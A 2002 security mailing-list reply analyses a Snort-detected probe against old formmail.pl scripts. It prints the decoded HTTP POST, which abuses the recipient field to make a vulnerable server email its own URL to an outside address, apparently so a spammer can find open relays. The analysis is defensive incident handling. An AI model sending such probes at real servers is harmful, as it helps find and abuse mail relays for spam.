|
Security Incidents
mailing list archives
Re: new type of formmail probes
From: "Kerry Thompson" <kerry () crypt gen nz>
Date: Fri, 6 Sep 2002 09:12:59 +1200 (NZST)
Hi Russell
I don't see any fancy unicode or DOS commands in here, so I would say it
is a relatively harmless probe for open formmail relays, probably for spam
use. There are a number of automated tools that look for old formail.pl
programs to exploit as relays. The POST translated to plain text follows (
the backslash breaks are mine for readability ) :
---------------------------------------------------------------
POST /cgi-bin/formail.pl HTTP/1.0
Via: 1.0 SERVER
Connection: Keep-Alive
Content-Length: 402
User-Agent: Mozilla/4.06 (Win95; I)
Content-Type: application/x-www-form-urlencoded
Host: www.cs.auckland.ac.nz
Accept: image/gif, image/x-xpixmap, image/jpeg, application/msword, */*
Referer: www.cs.auckland.ac.nz
email=daa18 () fdj10 com&recipient=<iikestyx () aol com>www.cs.auckland.ac.nz\
&subject=www.cs.auckland.ac.nz/cgi-bin/formail.pl oxy52\
&=
time/date: 08:20:19pm / 09/04/2002
<A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">\
www.cs.auckland.ac.nz/cgi-bin/formail.pl</A>
oxy52
---------------------------------------------------------------
It seems to be probing formail and getting it to send an Email back to the
spammer containing a URL for the vulnerable formail.
I've checked Google for "oxy52" but found nothing, its probabaly just a
tag for whoever is receiving the mail.
Kerry
Russell Fulton said:
Hi All,
Over the last week or so snort has been picking up many probes like
this:
[snip]
--
Kerry Thompson, CISSP
Information Systems Security Consultant
http://www.crypt.gen.nz kerry () crypt gen nz
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
 By Date 
By Thread
Current thread:
|
Intro
